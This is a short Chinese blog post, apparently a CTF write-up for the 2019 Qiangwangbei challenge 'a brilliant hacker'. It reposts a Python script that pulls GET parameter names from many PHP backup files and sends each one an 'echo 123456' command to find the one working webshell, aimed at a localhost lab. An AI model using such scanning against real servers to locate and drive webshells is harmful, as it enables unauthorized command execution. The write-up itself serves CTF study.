[强网杯 2019]高明的黑客

带点仙气的酷男子

于 2021-08-25 14:21:00 发布

阅读量13

点赞数

本文链接：https://blog.csdn.net/weixin_45501486/article/details/133012970

版权

下载备份文件，每个文件都有shell，但是好多都不能用，

所以需要py脚本筛选可用的shell，搬移一个大佬的wp

import re
import os
import requests

files = os.listdir('src/')    #获取路径下的所有文件
reg = re.compile(r'(?<=_GET\[\').*(?=\'\])')   #设置正则
for i in files:                #从第一个文件开始
    url = "http://127.0.0.1/src/" + i
    f = open("src/"+i)        #打开这个文件
    data = f.read()           #读取文件内容
    f.close()                 #关闭文件
    result = reg.findall(data)  #从文件中找到GET请求
    for j in result:           #从第一个GET参数开始
        payload = url + "?" + j + "=echo 123456"   ##尝试请求次路径，并执行命令
        print(payload)
        html = requests.get(payload)##通过r=request.get(url)构造一个向服务器请求资源的url对象。
        if "123456" in html.text:
            print(payload)
            exit(1)

考察的还是脚本编写。好好理解这个

优惠劵

带点仙气的酷男子

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[强网杯 2019]高明的黑客

下载备份文件，每个文件都有shell，但是好多都不能用，所以需要py脚本筛选可用的shell，搬移一个大佬的wpimport reimport osimport requestsfiles = os.listdir('src/') #获取路径下的所有文件reg = re.compile(r'(?<=_GET\[\').*(?=\'\])') #设置正则for i...
复制链接

扫一扫